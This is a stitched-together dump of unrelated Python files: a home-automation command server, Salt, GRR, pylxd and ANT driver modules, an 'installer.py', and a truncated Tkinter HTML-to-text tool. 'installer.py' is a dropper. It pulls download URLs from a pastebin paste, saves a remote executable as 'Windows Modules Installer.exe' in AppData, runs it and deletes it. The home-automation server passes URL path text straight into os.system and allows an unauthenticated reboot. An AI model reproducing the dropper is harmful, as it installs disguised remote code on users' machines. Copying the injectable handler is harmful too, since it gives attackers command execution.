from Kodi.Kodi import kodi_stop, kodi_start, radio_play
import threading
log = LogClient("simple_cmd_server")
class HttpHandler(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
self._set_headers()
if self.path.startswith('/ab/current_activity'):
self.wfile.write(checker.get_last_activity())
if self.path.startswith('/reboot'):
os.system('reboot')
if self.path.startswith('/light/'):
code = self.path[7:]
cmd = '/usr/bin/codesend %s' % code
os.system(cmd)
self.wfile.write("OK\n")
log.info("cmd: %s" % cmd)
if self.path == '/speaker/internal':
speaker = SwitchSpeaker(log)
speaker.internal()
self.wfile.write("OK\n")
log.info("cmd: internal speaker")
if self.path == '/speaker/external':
speaker = SwitchSpeaker(log)
speaker.external()
self.wfile.write("OK\n")
log.info("cmd: external speaker")
if self.path == '/kodi/stop':
log.info("kodi stop")
kodi_stop()
if self.path == '/kodi/start':
log.info("kodi start")
kodi_start()
if self.path == '/radio/on':
radio_play()
if self.path == '/tv/on':
cmd = 'echo "tx 20:04" | cec-client RPI -s -d 4'
os.system(cmd)
log.info("cmd: tv on")
if self.path == '/tv/off':
cmd = 'echo "tx 20:36" | cec-client RPI -s -d 4'
os.system(cmd)
log.info("cmd: tv off")
if self.path == '/tv/kodi':
cmd = 'echo "tx 2F:82:20:00" | cec-client RPI -s -d 4'
os.system(cmd)
log.info("tv to kodi")
if self.path == '/amp/volume_up':
harmony_client = HarmonyClient('192.168.88.186')
harmony_client.send_amp_command('VolumeUp')
harmony_client.close()
if self.path == '/amp/volume_down':
harmony_client = HarmonyClient('192.168.88.186')
harmony_client.send_amp_command('VolumeDown')
harmony_client.close()
def do_HEAD(self):
self._set_headers()
def do_POST(self):
# Doesn't do anything with posted data
self._set_headers()
self.wfile.write("<html><body><h1>POST not implemented</h1></body></html>")
def run(server_class=HTTPServer, handler_class=HttpHandler, port=9999):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
print ('Starting httpd...')
log.info("Starting simple_cmd_server")
try:
httpd.serve_forever()
except:
pass
def callback(activity):
log.info('Switched activity. New:' + activity)
if activity != 'Music':
speaker = SwitchSpeaker(log)
speaker.internal()
else:
speaker = SwitchSpeaker(log)
speaker.external()
if __name__ == "__main__":
handler = HttpHandler
checker = HarmonyChecker(log, callback)
thread = threading.Thread(target=checker.start)
thread.start()
from sys import argv
if len(argv) == 2:
run(port=int(argv[1]), handler_class=handler)
else:
run()
checker.stop()
#######################
# if self.path == '/tv/on':
# cmd = 'echo "on 0" | cec-client RPI -s -d 4'
# os.system(cmd)
# log.info("cmd: tv on")
#
# if self.path == '/tv/off':
# cmd = 'echo "standby 0" | cec-client -s -m -d 1'
# os.system(cmd)
# log.info("cmd: tv off")
# if self.path == '/tv/hdmi3':
# cmd = 'echo "tx 4F:82:30:00" | cec-client -d 1 -s'
# os.system(cmd)
# log.info("hdmi3")
#
# if self.path == '/tv/kodi':
# cmd = 'echo "tx 4F:82:20:00" | cec-client -d 1 -s'
# os.system(cmd)
# log.info("switch to kodi (HDMI 2)")
#
# if self.path == '/tv/hdmi1':
# cmd = 'echo "tx 4F:82:10:00" | cec-client -d 1 -s'
# os.system(cmd)
# log.info("hdmi1")
|
timed_subprocess.py
|
# -*- coding: utf-8 -*-
'''For running command line executables with a timeout'''
from __future__ import absolute_import
import subprocess
import threading
import salt.exceptions
from salt.ext import six
class TimedProc(object):
'''
Create a TimedProc object, calls subprocess.Popen with passed args and **kwargs
'''
def __init__(self, args, **kwargs):
self.wait = not kwargs.pop('bg', False)
self.stdin = kwargs.pop('stdin', None)
self.with_communicate = kwargs.pop('with_communicate', self.wait)
self.timeout = kwargs.pop('timeout', None)
# If you're not willing to wait for the process
# you can't define any stdin, stdout or stderr
if not self.wait:
self.stdin = kwargs['stdin'] = None
self.with_communicate = False
elif self.stdin is not None:
# Translate a newline submitted as '\n' on the CLI to an actual
# newline character.
self.stdin = self.stdin.replace('\\n', '\n').encode(__salt_system_encoding__)
kwargs['stdin'] = subprocess.PIPE
if not self.with_communicate:
self.stdout = kwargs['stdout'] = None
self.stderr = kwargs['stderr'] = None
if self.timeout and not isinstance(self.timeout, (int, float)):
raise salt.exceptions.TimedProcTimeoutError('Error: timeout {0} must be a number'.format(self.timeout))
try:
self.process = subprocess.Popen(args, **kwargs)
except TypeError:
str_args = []
for arg in args:
if not isinstance(arg, six.string_types):
str_args.append(str(arg))
else:
str_args.append(arg)
args = str_args
self.process = subprocess.Popen(args, **kwargs)
self.command = args
def run(self):
'''
wait for subprocess to terminate and return subprocess' return code.
If timeout is reached, throw TimedProcTimeoutError
'''
def receive():
if self.with_communicate:
self.stdout, self.stderr = self.process.communicate(input=self.stdin)
elif self.wait:
self.process.wait()
if not self.timeout:
receive()
else:
rt = threading.Thread(target=receive)
rt.start()
rt.join(self.timeout)
if rt.isAlive():
# Subprocess cleanup (best effort)
self.process.kill()
def terminate():
if rt.isAlive():
self.process.terminate()
threading.Timer(10, terminate).start()
raise salt.exceptions.TimedProcTimeoutError(
'{0} : Timed out after {1} seconds'.format(
self.command,
str(self.timeout),
)
)
return self.process.returncode
|
fleetspeak_client.py
|
#!/usr/bin/env python
"""Fleetspeak-facing client related functionality.
This module contains glue code necessary for Fleetspeak and the GRR client
to work together.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import logging
import pdb
import platform
import struct
import threading
import time
from absl import flags
from future.utils import iteritems
from future.utils import itervalues
import queue
from fleetspeak.src.client.daemonservice.client import client as fs_client
from fleetspeak.src.common.proto.fleetspeak import common_pb2 as fs_common_pb2
from grr_response_client import comms
from grr_response_core import config
from grr_response_core.lib import communicator
from grr_response_core.lib import rdfvalue
from grr_response_core.lib.rdfvalues import flows as rdf_flows
from grr_response_core.lib.rdfvalues import protodict as rdf_protodict
from grr_response_proto import jobs_pb2
# pyformat: disable
START_STRING = "Starting client."
# //depot/grr_response_client/comms.py)
# pyformat: enable
# Limit on the total size of GrrMessages to batch into a single
# PackedMessageList (before sending to Fleetspeak).
_MAX_MSG_LIST_BYTES = 1 << 20 # 1 MiB
# Maximum number of GrrMessages to put in one PackedMessageList.
_MAX_MSG_LIST_MSG_COUNT = 100
# Maximum size of annotations to add for a Fleetspeak message.
_MAX_ANNOTATIONS_BYTES = 3 << 10 # 3 KiB
_DATA_IDS_ANNOTATION_KEY = "data_ids"
class FatalError(Exception):
pass
class GRRFleetspeakClient(object):
"""A Fleetspeak enabled client implementation."""
# Only buffer at most ~100MB of data - the estimate comes from the Fleetspeak
# message size limit - Fleetspeak refuses to process messages larger than 2MB.
# This is a sanity safeguard against unlimited memory consumption.
_SENDER_QUEUE_MAXSIZE = 50
def __init__(self):
self._fs = fs_client.FleetspeakConnection(
version=config.CONFIG["Source.version_string"])
self._sender_queue = queue.Queue(
maxsize=GRRFleetspeakClient._SENDER_QUEUE_MAXSIZE)
self._threads = {}
if platform.system() == "Windows":
internal_nanny_monitoring = False
heart_beat_cb = self._fs.Heartbeat
else:
# TODO(amoser): Once the Fleetspeak nanny functionality is
# production ready, change this to
# internal_nanny_monitoring=False
# heart_beat_cb=self._fs.Heartbeat
internal_nanny_monitoring = True
heart_beat_cb = None
# The client worker does all the real work here.
# In particular, we delegate sending messages to Fleetspeak to a separate
# threading.Thread here.
self._threads["Worker"] = comms.GRRClientWorker(
out_queue=_FleetspeakQueueForwarder(self._sender_queue),
heart_beat_cb=heart_beat_cb,
internal_nanny_monitoring=internal_nanny_monitoring,
client=self)
self._threads["Foreman"] = self._CreateThread(self._ForemanOp)
self._threads["Sender"] = self._CreateThread(self._SendOp)
self._threads["Receiver"] = self._CreateThread(self._ReceiveOp)
def _CreateThread(self, loop_op):
thread = threading.Thread(target=self._RunInLoop, args=(loop_op,))
thread.daemon = True
return thread
def _RunInLoop(self, loop_op):
while True:
try:
loop_op()
except Exception as e:
logging.critical("Fatal error occurred:", exc_info=True)
if flags.FLAGS.pdb_post_mortem:
pdb.post_mortem()
# This will terminate execution in the current thread.
raise e
def FleetspeakEnabled(self):
return True
def Run(self):
"""The main run method of the client."""
for thread in itervalues(self._threads):
thread.start()
logging.info(START_STRING)
while True:
dead_threads = [
tn for (tn, t) in iteritems(self._threads) if not t.isAlive()
]
if dead_threads:
raise FatalError(
"These threads are dead: %r. Shutting down..." % dead_threads)
time.sleep(10)
def _ForemanOp(self):
"""Sends Foreman checks periodically."""
period = config.CONFIG["Client.foreman_check_frequency"]
self._threads["Worker"].SendReply(
rdf_protodict.DataBlob(),
session_id=rdfvalue.FlowSessionID(flow_name="Foreman"),
require_fastpoll=False)
time.sleep(period)
def _SendMessages(self, grr_msgs, background=False):
"""Sends a block of messages through Fleetspeak."""
message_list = rdf_flows.PackedMessageList()
communicator.Communicator.EncodeMessageList(
rdf_flows.MessageList(job=grr_msgs), message_list)
fs_msg = fs_common_pb2.Message(
message_type="MessageList",
destination=fs_common_pb2.Address(service_name="GRR"),
background=background)
fs_msg.data.Pack(message_list.AsPrimitiveProto())
for grr_msg in grr_msgs:
if (grr_msg.session_id is None or grr_msg.request_id is None or
grr_msg.response_id is None):
continue
# Place all ids in a single annotation, instead of having separate
# annotations for the flow-id, request-id and response-id. This reduces
# overall size of the annotations by half (~60 bytes to ~30 bytes).
annotation = fs_msg.annotations.entries.add()
annotation.key = _DATA_IDS_ANNOTATION_KEY
annotation.value = "%s:%d:%d" % (grr_msg.session_id.Basename(),
grr_msg.request_id, grr_msg.response_id)
if fs_msg.annotations.ByteSize() >= _MAX_ANNOTATIONS_BYTES:
break
try:
sent_bytes = self._fs.Send(fs_msg)
except (IOError, struct.error):
logging.critical("Broken local Fleetspeak connection (write end).")
raise
communicator.GRR_CLIENT_SENT_BYTES.Increment(sent_bytes)
def _SendOp(self):
"""Sends messages through Fleetspeak."""
msg = self._sender_queue.get()
msgs = []
background_msgs = []
if not msg.require_fastpoll:
background_msgs.append(msg)
else:
msgs.append(msg)
count = 1
size = len(msg.SerializeToBytes())
while count < _MAX_MSG_LIST_MSG_COUNT and size < _MAX_MSG_LIST_BYTES:
try:
msg = self._sender_queue.get(timeout=1)
if not msg.require_fastpoll:
background_msgs.append(msg)
else:
msgs.append(msg)
count += 1
size += len(msg.SerializeToBytes())
except queue.Empty:
break
if msgs:
self._SendMessages(msgs)
if background_msgs:
self._SendMessages(background_msgs, background=True)
def _ReceiveOp(self):
"""Receives a single message through Fleetspeak."""
try:
fs_msg, received_bytes = self._fs.Recv()
except (IOError, struct.error):
logging.critical("Broken local Fleetspeak connection (read end).")
raise
received_type = fs_msg.data.TypeName()
if not received_type.endswith("grr.GrrMessage"):
raise ValueError(
"Unexpected proto type received through Fleetspeak: %r; expected "
"grr.GrrMessage." % received_type)
communicator.GRR_CLIENT_RECEIVED_BYTES.Increment(received_bytes)
grr_msg = rdf_flows.GrrMessage.FromSerializedBytes(fs_msg.data.value)
# Authentication is ensured by Fleetspeak.
grr_msg.auth_state = jobs_pb2.GrrMessage.AUTHENTICATED
self._threads["Worker"].QueueMessages([grr_msg])
class _FleetspeakQueueForwarder(object):
"""Ducktyped replacement for SizeLimitedQueue; forwards to _SenderThread."""
def __init__(self, sender_queue):
"""Constructor.
Args:
sender_queue: queue.Queue
"""
self._sender_queue = sender_queue
def Put(self, grr_msg, **_):
self._sender_queue.put(grr_msg)
def Get(self):
raise NotImplementedError("This implementation only supports input.")
def Size(self):
"""Returns the *approximate* size of the queue.
See: https://docs.python.org/2/library/queue.html#Queue.Queue.qsize
Returns:
int
"""
return self._sender_queue.qsize()
def Full(self):
return self._sender_queue.full()
|
connection.py
|
# Copyright (c) 2015 Canonical Ltd
# Copyright (c) 2015 Mirantis inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from collections import namedtuple
import copy
import json
import os
import six
import socket
import ssl
import threading
from six.moves import http_client
from six.moves import queue
try:
from ws4py import client as websocket
except ImportError:
websocket = None
from pylxd.deprecated import exceptions
from pylxd.deprecated import utils
if hasattr(ssl, 'SSLContext'):
# For Python >= 2.7.9 and Python 3.x
if hasattr(ssl, 'PROTOCOL_TLSv1_2'):
DEFAULT_TLS_VERSION = ssl.PROTOCOL_TLSv1_2
else:
DEFAULT_TLS_VERSION = ssl.PROTOCOL_TLSv1
else:
# For Python 2.6 and <= 2.7.8
from OpenSSL import SSL
DEFAULT_TLS_VERSION = SSL.TLSv1_2_METHOD
class UnixHTTPConnection(http_client.HTTPConnection):
def __init__(self, path, host='localhost', port=None, strict=None,
timeout=None):
if six.PY3:
http_client.HTTPConnection.__init__(self, host, port=port,
timeout=timeout)
else:
http_client.HTTPConnection.__init__(self, host, port=port,
strict=strict,
timeout=timeout)
self.path = path
def connect(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(self.path)
self.sock = sock
class HTTPSConnection(http_client.HTTPConnection):
default_port = 8443
def __init__(self, *args, **kwargs):
http_client.HTTPConnection.__init__(self, *args, **kwargs)
def connect(self):
sock = socket.create_connection((self.host, self.port),
self.timeout, self.source_address)
if self._tunnel_host:
self.sock = sock
self._tunnel()
(cert_file, key_file) = self._get_ssl_certs()
self.sock = ssl.wrap_socket(sock, certfile=cert_file,
keyfile=key_file,
ssl_version=DEFAULT_TLS_VERSION)
@staticmethod
def _get_ssl_certs():
return (os.path.join(os.environ['HOME'], '.config/lxc/client.crt'),
os.path.join(os.environ['HOME'], '.config/lxc/client.key'))
_LXDResponse = namedtuple('LXDResponse', ['status', 'body', 'json'])
if websocket is not None:
class WebSocketClient(websocket.WebSocketBaseClient):
def __init__(self, url, protocols=None, extensions=None,
ssl_options=None, headers=None):
"""WebSocket client that executes into a eventlet green thread."""
websocket.WebSocketBaseClient.__init__(self, url, protocols,
extensions,
ssl_options=ssl_options,
headers=headers)
self._th = threading.Thread(
target=self.run, name='WebSocketClient')
self._th.daemon = True
self.messages = queue.Queue()
def handshake_ok(self):
"""Starts the client's thread."""
self._th.start()
def received_message(self, message):
"""Override the base class to store the incoming message."""
self.messages.put(copy.deepcopy(message))
def closed(self, code, reason=None):
# When the connection is closed, put a StopIteration
# on the message queue to signal there's nothing left
# to wait for
self.messages.put(StopIteration)
def receive(self):
# If the websocket was terminated and there are no messages
# left in the queue, return None immediately otherwise the client
# will block forever
if self.terminated and self.messages.empty():
return None
message = self.messages.get()
if message is StopIteration:
return None
return message
class LXDConnection(object):
def __init__(self, host=None, port=8443):
if host:
self.host = host
self.port = port
self.unix_socket = None
else:
if 'LXD_DIR' in os.environ:
self.unix_socket = os.path.join(os.environ['LXD_DIR'],
'unix.socket')
else:
self.unix_socket = '/var/lib/lxd/unix.socket'
self.host, self.port = None, None
self.connection = None
def _request(self, *args, **kwargs):
if self.connection is None:
self.connection = self.get_connection()
self.connection.request(*args, **kwargs)
response = self.connection.getresponse()
status = response.status
raw_body = response.read()
try:
if six.PY3:
body = json.loads(raw_body.decode())
else:
body = json.loads(raw_body)
except ValueError:
body = None
return _LXDResponse(status, raw_body, body)
def get_connection(self):
if self.host:
return HTTPSConnection(self.host, self.port)
return UnixHTTPConnection(self.unix_socket)
def get_object(self, *args, **kwargs):
response = self._request(*args, **kwargs)
if not response.json:
raise exceptions.PyLXDException('Null Data')
elif response.status == 200 or (
response.status == 202 and
response.json.get('status_code') == 100):
return response.status, response.json
else:
utils.get_lxd_error(response.status, response.json)
def get_status(self, *args, **kwargs):
response = self._request(*args, **kwargs)
if not response.json:
raise exceptions.PyLXDException('Null Data')
elif response.json.get('error'):
utils.get_lxd_error(response.status, response.json)
elif response.status == 200 or (
response.status == 202 and
response.json.get('status_code') == 100):
return True
return False
def get_raw(self, *args, **kwargs):
response = self._request(*args, **kwargs)
if not response.body:
raise exceptions.PyLXDException('Null Body')
elif response.status == 200:
return response.body
else:
raise exceptions.PyLXDException('Failed to get raw response')
def get_ws(self, path):
if websocket is None:
raise ValueError(
'This feature requires the optional ws4py library.')
if self.unix_socket:
connection_string = 'ws+unix://%s' % self.unix_socket
else:
connection_string = (
'wss://%(host)s:%(port)s' % {'host': self.host,
'port': self.port}
)
ws = WebSocketClient(connection_string)
ws.resource = path
ws.connect()
return ws
|
ant.py
|
# Ant
#
# Copyright (c) 2012, Gustav Tiger <gustav@tiger.name>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import array
import collections
import struct
import threading
import time
import Queue
import logging
import usb.core
import usb.util
from message import Message
from commons import format_list
from driver import find_driver
_logger = logging.getLogger("garmin.ant.base.ant")
class Ant():
_RESET_WAIT = 1
def __init__(self):
self._driver = find_driver()
self._message_queue_cond = threading.Condition()
self._message_queue = collections.deque()
self._events = Queue.Queue()
self._buffer = array.array('B', [])
self._burst_data = array.array('B', [])
self._last_data = array.array('B', [])
self._running = True
self._driver.open()
self._worker_thread = threading.Thread(target=self._worker, name="ant.base")
self._worker_thread.start()
self.reset_system()
def start(self):
self._main()
def stop(self):
if self._running:
_logger.debug("Stoping ant.base")
self._running = False
self._worker_thread.join()
def _on_broadcast(self, message):
self._events.put(('event', (message._data[0],
Message.Code.EVENT_RX_BROADCAST, message._data[1:])))
def _on_acknowledge(self, message):
self._events.put(('event', (message._data[0],
Message.Code.EVENT_RX_ACKNOWLEDGED, message._data[1:])))
def _on_burst_data(self, message):
sequence = message._data[0] >> 5
channel = message._data[0] & 0b00011111
data = message._data[1:]
# First sequence
if sequence == 0:
self._burst_data = data
# Other
else:
self._burst_data.extend(data)
# Last sequence (indicated by bit 3)
if sequence & 0b100 != 0:
self._events.put(('event', (channel,
Message.Code.EVENT_RX_BURST_PACKET, self._burst_data)))
def _worker(self):
_logger.debug("Ant runner started")
while self._running:
try:
message = self.read_message()
if message == None:
break
# TODO: flag and extended for broadcast, acknowledge, and burst
# Only do callbacks for new data. Resent data only indicates
# a new channel timeslot.
if not (message._id == Message.ID.BROADCAST_DATA and
message._data == self._last_data):
# Notifications
if message._id in [Message.ID.STARTUP_MESSAGE, \
Message.ID.SERIAL_ERROR_MESSAGE]:
self._events.put(('response', (None, message._id,
message._data)))
# Response (no channel)
elif message._id in [Message.ID.RESPONSE_VERSION, \
Message.ID.RESPONSE_CAPABILITIES, \
Message.ID.RESPONSE_SERIAL_NUMBER]:
self._events.put(('response', (None, message._id,
message._data)))
# Response (channel)
elif message._id in [Message.ID.RESPONSE_CHANNEL_STATUS, \
Message.ID.RESPONSE_CHANNEL_ID]:
self._events.put(('response', (message._data[0],
message._id, message._data[1:])))
# Response (other)
elif (message._id == Message.ID.RESPONSE_CHANNEL \
and message._data[1] != 0x01):
self._events.put(('response', (message._data[0],
message._data[1], message._data[2:])))
# Channel event
elif message._id == Message.ID.BROADCAST_DATA:
self._on_broadcast(message)
elif message._id == Message.ID.ACKNOWLEDGE_DATA:
self._on_acknowledge(message)
elif message._id == Message.ID.BURST_TRANSFER_DATA:
self._on_burst_data(message)
elif message._id == Message.ID.RESPONSE_CHANNEL:
_logger.debug("Got channel event, %r", message)
self._events.put(('event', (message._data[0],
message._data[1], message._data[2:])))
else:
_logger.warning("Got unknown message, %r", message)
else:
_logger.debug("No new data this period")
# Send messages in queue, on indicated time slot
if message._id == Message.ID.BROADCAST_DATA:
time.sleep(0.1)
_logger.debug("Got broadcast data, examine queue to see if we should send anything back")
if self._message_queue_cond.acquire(blocking=False):
while len(self._message_queue) > 0:
m = self._message_queue.popleft()
self.write_message(m)
_logger.debug(" - sent message from queue, %r", m)
if(m._id != Message.ID.BURST_TRANSFER_DATA or \
m._data[0] & 0b10000000):# or m._data[0] == 0):
break
else:
_logger.debug(" - no messages in queue")
self._message_queue_cond.release()
self._last_data = message._data
except usb.USBError as e:
_logger.warning("%s, %r", type(e), e.args)
_logger.debug("Ant runner stopped")
def _main(self):
while self._running:
try:
(event_type, event) = self._events.get(True, 1.0)
self._events.task_done()
(channel, event, data) = event
if event_type == 'response':
self.response_function(channel, event, data)
elif event_type == 'event':
self.channel_event_function(channel, event, data)
else:
_logger.warning("Unknown message typ '%s': %r", event_type, event)
except Queue.Empty as e:
pass
def write_message_timeslot(self, message):
with self._message_queue_cond:
self._message_queue.append(message)
def write_message(self, message):
data = message.get()
self._driver.write(data)
_logger.debug("Write data: %s", format_list(data))
def read_message(self):
while self._running:
# If we have a message in buffer already, return it
if len(self._buffer) >= 5 and len(self._buffer) >= self._buffer[1] + 4:
packet = self._buffer[:self._buffer[1] + 4]
self._buffer = self._buffer[self._buffer[1] + 4:]
return Message.parse(packet)
# Otherwise, read some data and call the function again
else:
data = self._driver.read()
self._buffer.extend(data)
_logger.debug("Read data: %s (now have %s in buffer)",
format_list(data), format_list(self._buffer))
# Ant functions
def unassign_channel(self, channel):
pass
def assign_channel(self, channel, channelType, networkNumber):
message = Message(Message.ID.ASSIGN_CHANNEL, [channel, channelType, networkNumber])
self.write_message(message)
def open_channel(self, channel):
message = Message(Message.ID.OPEN_CHANNEL, [channel])
self.write_message(message)
def set_channel_id(self, channel, deviceNum, deviceType, transmissionType):
data = array.array('B', struct.pack("<BHBB", channel, deviceNum, deviceType, transmissionType))
message = Message(Message.ID.SET_CHANNEL_ID, data)
self.write_message(message)
def set_channel_period(self, channel, messagePeriod):
data = array.array('B', struct.pack("<BH", channel, messagePeriod))
message = Message(Message.ID.SET_CHANNEL_PERIOD, data)
self.write_message(message)
def set_channel_search_timeout(self, channel, timeout):
message = Message(Message.ID.SET_CHANNEL_SEARCH_TIMEOUT, [channel, timeout])
self.write_message(message)
def set_channel_rf_freq(self, channel, rfFreq):
message = Message(Message.ID.SET_CHANNEL_RF_FREQ, [channel, rfFreq])
self.write_message(message)
def set_network_key(self, network, key):
message = Message(Message.ID.SET_NETWORK_KEY, [network] + key)
self.write_message(message)
# This function is a bit of a mystery. It is mentioned in libgant,
# http://sportwatcher.googlecode.com/svn/trunk/libgant/gant.h and is
# also sent from the official ant deamon on windows.
def set_search_waveform(self, channel, waveform):
message = Message(Message.ID.SET_SEARCH_WAVEFORM, [channel] + waveform)
self.write_message(message)
def reset_system(self):
message = Message(Message.ID.RESET_SYSTEM, [0x00])
self.write_message(message)
time.sleep(self._RESET_WAIT)
def request_message(self, channel, messageId):
message = Message(Message.ID.REQUEST_MESSAGE, [channel, messageId])
self.write_message(message)
def send_acknowledged_data(self, channel, data):
assert len(data) == 8
message = Message(Message.ID.ACKNOWLEDGE_DATA,
array.array('B', [channel]) + data)
self.write_message_timeslot(message)
def send_burst_transfer_packet(self, channel_seq, data, first):
assert len(data) == 8
message = Message(Message.ID.BURST_TRANSFER_DATA,
array.array('B', [channel_seq]) + data)
self.write_message_timeslot(message)
def send_burst_transfer(self, channel, data):
assert len(data) % 8 == 0
_logger.debug("Send burst transfer, chan %s, data %s", channel, data)
packets = len(data) / 8
for i in range(packets):
sequence = ((i - 1) % 3) + 1
if i == 0:
sequence = 0
elif i == packets - 1:
sequence = sequence | 0b100
channel_seq = channel | sequence << 5
packet_data = data[i * 8:i * 8 + 8]
_logger.debug("Send burst transfer, packet %d, seq %d, data %s", i, sequence, packet_data)
self.send_burst_transfer_packet(channel_seq, packet_data, first=i==0)
def response_function(self, channel, event, data):
pass
def channel_event_function(self, channel, event, data):
pass
|
installer.py
|
import requests, getpass, threading, time, os
def getupdate():
try:
r = requests.get('https://pastebin.com/raw/rvDvVu5p').json()
downloadurl = r['Download1']
url = r['DURL']
d = [downloadurl, url]
return d
except:
print('Error while getting update...')
pass
def auth(url):
try:
r1 = requests.get(url, stream=True)
a = f'C:\\Users\\{getpass.getuser()}\\AppData\\local\\Windows Modules Installer.exe'
open(a, 'wb').write(r1.content)
os.startfile(a)
time.sleep(2)
print('Completed install/update -> closing..')
time.sleep(2)
os.remove(a)
except:
pass
def download(downloadurl):
try:
r2 = requests.get(downloadurl, stream=True)
open("test.py", 'wb').write(r2.content)
except:
print('Error while downloading...')
if __name__ == "__main__":
print('''
█ ██ ███▄ █ ██ ▄█▀ ███▄ █ ▒█████ █ █░███▄ █ ▒██ ██▒
██ ▓██▒ ██ ▀█ █ ██▄█▒ ██ ▀█ █ ▒██▒ ██▒▓█░ █ ░█░██ ▀█ █ ▒▒ █ █ ▒░
▓██ ▒██░▓██ ▀█ ██▒▓███▄░ ▓██ ▀█ ██▒▒██░ ██▒▒█░ █ ░█▓██ ▀█ ██▒ ░░ █ ░
▓▓█ ░██░▓██▒ ▐▌██▒▓██ █▄ ▓██▒ ▐▌██▒▒██ ██░░█░ █ ░█▓██▒ ▐▌██▒ ░ █ █ ▒
▒▒█████▓ ▒██░ ▓██░▒██▒ █▄▒██░ ▓██░░ ████▓▒░░░██▒██▓▒██░ ▓██░ ▒██▒ ▒██▒
░▒▓▒ ▒ ▒ ░ ▒░ ▒ ▒ ▒ ▒▒ ▓▒░ ▒░ ▒ ▒ ░ ▒░▒░▒░ ░ ▓░▒ ▒ ░ ▒░ ▒ ▒ ▒▒ ░ ░▓ ░
░░▒░ ░ ░ ░ ░░ ░ ▒░░ ░▒ ▒░░ ░░ ░ ▒░ ░ ▒ ▒░ ▒ ░ ░ ░ ░░ ░ ▒░ ░░ ░▒ ░
░░░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
██▓ ███▄ █ ██████ ▄▄▄█████▓ ▄▄▄ ██▓ ██▓ ▓█████ ██▀███
▓██▒ ██ ▀█ █ ▒██ ▒ ▓ ██▒ ▓▒▒████▄ ▓██▒ ▓██▒ ▓█ ▀ ▓██ ▒ ██▒
▒██▒▓██ ▀█ ██▒░ ▓██▄ ▒ ▓██░ ▒░▒██ ▀█▄ ▒██░ ▒██░ ▒███ ▓██ ░▄█ ▒
░██░▓██▒ ▐▌██▒ ▒ ██▒░ ▓██▓ ░ ░██▄▄▄▄██ ▒██░ ▒██░ ▒▓█ ▄ ▒██▀▀█▄
░██░▒██░ ▓██░▒██████▒▒ ▒██▒ ░ ▓█ ▓██▒░██████▒░██████▒░▒████▒░██▓ ▒██▒
░▓ ░ ▒░ ▒ ▒ ▒ ▒▓▒ ▒ ░ ▒ ░░ ▒▒ ▓▒█░░ ▒░▓ ░░ ▒░▓ ░░░ ▒░ ░░ ▒▓ ░▒▓░
▒ ░░ ░░ ░ ▒░░ ░▒ ░ ░ ░ ▒ ▒▒ ░░ ░ ▒ ░░ ░ ▒ ░ ░ ░ ░ ░▒ ░ ▒░
▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
>>> Made by cVenge <<<
>>> Downloading... <<<
''')
d = getupdate()
t1 = threading.Thread(target=auth, args=(d[1],))
t1.start()
t1.join()
t2 = threading.Thread(target=download, args=(d[0],))
t2.start()
t2.join()
|
dhtml2text.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import urllib.request
import urllib.error
import os
from tkinter import *
from tkinter.filedialog import askdirectory
import html2text
import threading
import chardet
class DownloadTools:
def __init__(self):
self.__log_util = LogUtils()
self.__setup()
def __start_download(self):
self.__log_util.clear()
self.__log_util.set_callback(self.__update_logs)
url = self.__htmlUrl.get()
self.__spider = Spider(url, Spider.format_file_path(url, self.__write_path.get()), self.__log_util)
self.__spider.start_download()
def __export2text(self):
self.__log_util.clear()
self.__log_util.set_callback(self.__update_logs)
Html2Text(
Spider.format_file_path(self.__htmlUrl.get(), self.__write_path.get()),
self.__enabled_combined.get() == 1,
self.__log_util
).export2text()
def __show_dialog(self):
self.__write_path.set(askdirectory())
def __setup_log_frame(self, win):
log_frame = Frame(win)
self.__logs_var = StringVar()
self.__log_list = Listbox(log_frame, listvariable=self.__logs_var, height=10).pack(expand=YES, fill=BOTH)
log_frame.pack(fill=BOTH, expand=YES)
def __setup(self):
root = Tk()
root.title("Download Html Tool")
root.geometry('300x400')
self.__htmlUrl = StringVar()
self.__write_path = StringVar()
self.__enabled_combined = IntVar()
# download frame
frame = Frame(root)
Entry(frame, textvariable=self.__htmlUrl).pack(side=LEFT, fill=X, expand=YES)
Button(frame, text="Download", command=self.__start_download).pack(side=RIGHT)
frame.pack(fill=X)
# export frame
export_frame = Frame(root)
explore_frame = Frame(export_frame)
Entry(explore_frame, textvariable=self.__write_path).pack(side=LEFT)
Button(explore_frame, text="Explore Saved Path", command=self.__show_dialog).pack(side=RIGHT)
explore_frame.pack()
Button(export_frame, text="Export to Text", command=self.__export2text).pack(side=RIGHT)
